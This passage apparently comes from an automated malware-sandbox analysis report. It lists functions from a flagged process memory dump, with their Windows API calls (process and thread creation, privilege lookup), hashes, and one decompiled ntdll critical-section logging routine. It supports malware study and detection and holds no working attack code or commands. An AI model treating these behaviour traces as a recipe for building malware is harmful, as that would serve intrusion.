                                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00988584
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateInternalProcess
                                                                          • String ID:
                                                                          • API String ID: 2186235152-0
                                                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                          • Instruction ID: d8a214d0328f8105c4d496246ee8beaea5ff9e4346d1432cea2c4804c43d5e56
                                                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                          • Instruction Fuzzy Hash: 6501AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0DA7241CA30E851CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00987000, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0097CCC0,?,?), ref: 0098703C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID:
                                                                          • API String ID: 2422867632-0
                                                                          • Opcode ID: 8b1c57083d386ac6e1dd08ae63050efb13e6e4fb12fa63c5f9057b31e403db66
                                                                          • Instruction ID: 120534a66584898e08b2d25f1a612f9c3bf5d1f75163f87bc6c31cc690c2b523
                                                                          • Opcode Fuzzy Hash: 8b1c57083d386ac6e1dd08ae63050efb13e6e4fb12fa63c5f9057b31e403db66
                                                                          • Instruction Fuzzy Hash: 19E06D333812043AE2307599AC02FA7B39C8B81B20F140026FA0DEB2C2D595F90142A4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00986FF3, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0097CCC0,?,?), ref: 0098703C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID:
                                                                          • API String ID: 2422867632-0
                                                                          • Opcode ID: d4a8c7176bd4b5ab3a142e2d252f6bfb6ae90bfd76dfa9c23417efb24dda96c0
                                                                          • Instruction ID: 872be7f2af7fbc2803b5324295149ef76d674ba740ae8b180f6d97fb7dd2b312
                                                                          • Opcode Fuzzy Hash: d4a8c7176bd4b5ab3a142e2d252f6bfb6ae90bfd76dfa9c23417efb24dda96c0
                                                                          • Instruction Fuzzy Hash: A7F0E5322953403FD33176699C03FA7B7988FD2B20F694169F648AB2D3C7A5F90183A4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00988611, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0097CF92,0097CF92,?,00000000,?,?), ref: 00988650
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LookupPrivilegeValue
                                                                          • String ID:
                                                                          • API String ID: 3899507212-0
                                                                          • Opcode ID: 15643260b8d12ad60016ee49d2c82c8e790c8abacaf27d86f359413f3c3a877f
                                                                          • Instruction ID: 95406cd4820ea912e7615d9c490615933827ebd9386f43a97f0abaa83013d02d
                                                                          • Opcode Fuzzy Hash: 15643260b8d12ad60016ee49d2c82c8e790c8abacaf27d86f359413f3c3a877f
                                                                          • Instruction Fuzzy Hash: 5DE06DB66002146BDB10DF55CC40FEB37A9EF84350F018599FA4C5B381CA34E8108BF4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00988480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00983506,?,00983C7F,00983C7F,?,00983506,?,?,?,?,?,00000000,00000000,?), ref: 009884AD
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                          • Instruction ID: a9af3ab7ef860826b8dd86e8bee42f87f36ca016adf2749b0bc7e401c957bc94
                                                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                          • Instruction Fuzzy Hash: 7AE012B1200208ABDB14EF99CC41EA777ACAF88750F118558BA086B382CA30F9108BF0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00988620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0097CF92,0097CF92,?,00000000,?,?), ref: 00988650
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LookupPrivilegeValue
                                                                          • String ID:
                                                                          • API String ID: 3899507212-0
                                                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                          • Instruction ID: c42ce0927d26952643ea75393b65796efd3a6aa4938656a4995e822dc4ca3882
                                                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                          • Instruction Fuzzy Hash: BBE01AB12002086BDB10EF49CC85EE737ADAF88750F018154BA086B381C934E8108BF5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0097D3F7, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,00977C63,?), ref: 0097D42B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: 265738c69cbc03c42bcd3b73d9dac623d5b3375b3164e1e5953b6e1d1a066221
                                                                          • Instruction ID: 7cd386b23cef3a85eededc9a85eed3026833dab7a45690e9f601e231e15285b5
                                                                          • Opcode Fuzzy Hash: 265738c69cbc03c42bcd3b73d9dac623d5b3375b3164e1e5953b6e1d1a066221
                                                                          • Instruction Fuzzy Hash: 5AD02B767902007AEA00AAA0DC03F6232499BC5B00F098428F44DEB3C3C960D5094120
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0097D400, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,00977C63,?), ref: 0097D42B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                          • Instruction ID: 0170fc0d88bc6c872e0b27c912f84c5547e807a96298ab1c58b0545fe88e7e86
                                                                          • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                          • Instruction Fuzzy Hash: B0D0A7727903043BEA10FAA4DC03F2632CD9B45B00F498064F94CD73C3DA60F5004161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0507967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: da611e96f7ee191961ddd305a36e59ec2edea5f95791d16383cecc5870eda0d9
                                                                          • Instruction ID: c0e8683ae995676d32e9a17e159b5c4717097370c1442e4a545e713309ab5307
                                                                          • Opcode Fuzzy Hash: da611e96f7ee191961ddd305a36e59ec2edea5f95791d16383cecc5870eda0d9
                                                                          • Instruction Fuzzy Hash: 7DB09B72D014C5C5D651E7609608F3F7A5177D0741F56C551D1420645A4778C091F5B9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Function 050CFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 53%
                                                                          			E050CFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0507CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E050C5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E050C5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                          0x050cfdda
                                                                          0x050cfde2
                                                                          0x050cfde5
                                                                          0x050cfdec
                                                                          0x050cfdfa
                                                                          0x050cfdff
                                                                          0x050cfe0a
                                                                          0x050cfe0f
                                                                          0x050cfe17
                                                                          0x050cfe1e
                                                                          0x050cfe19
                                                                          0x050cfe19
                                                                          0x050cfe19
                                                                          0x050cfe20
                                                                          0x050cfe21
                                                                          0x050cfe22
                                                                          0x050cfe25
                                                                          0x050cfe40

                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 050CFDFA
                                                                          Strings
                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 050CFE2B
                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 050CFE01
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.914054989.0000000005010000.00000040.00000001.sdmp, Offset: 05010000, based on PE: true
                                                                          • Associated: 0000000B.00000002.914528335.000000000512B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                          • API String ID: 885266447-3903918235
                                                                          • Opcode ID: 1f745438f27b60c9c87e826a1f672def0ce3d372299d4239cdcf9726389cacc1
                                                                          • Instruction ID: cb393d11229b2dd2fc1ec4a8a4287dce9d696363834db9d99f801b7f773dc9c3
                                                                          • Opcode Fuzzy Hash: 1f745438f27b60c9c87e826a1f672def0ce3d372299d4239cdcf9726389cacc1
                                                                          • Instruction Fuzzy Hash: 84F0FC36640101BFD6201B45FC05F6F7F5BEB45730F244359F618551D1D962F86096F5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%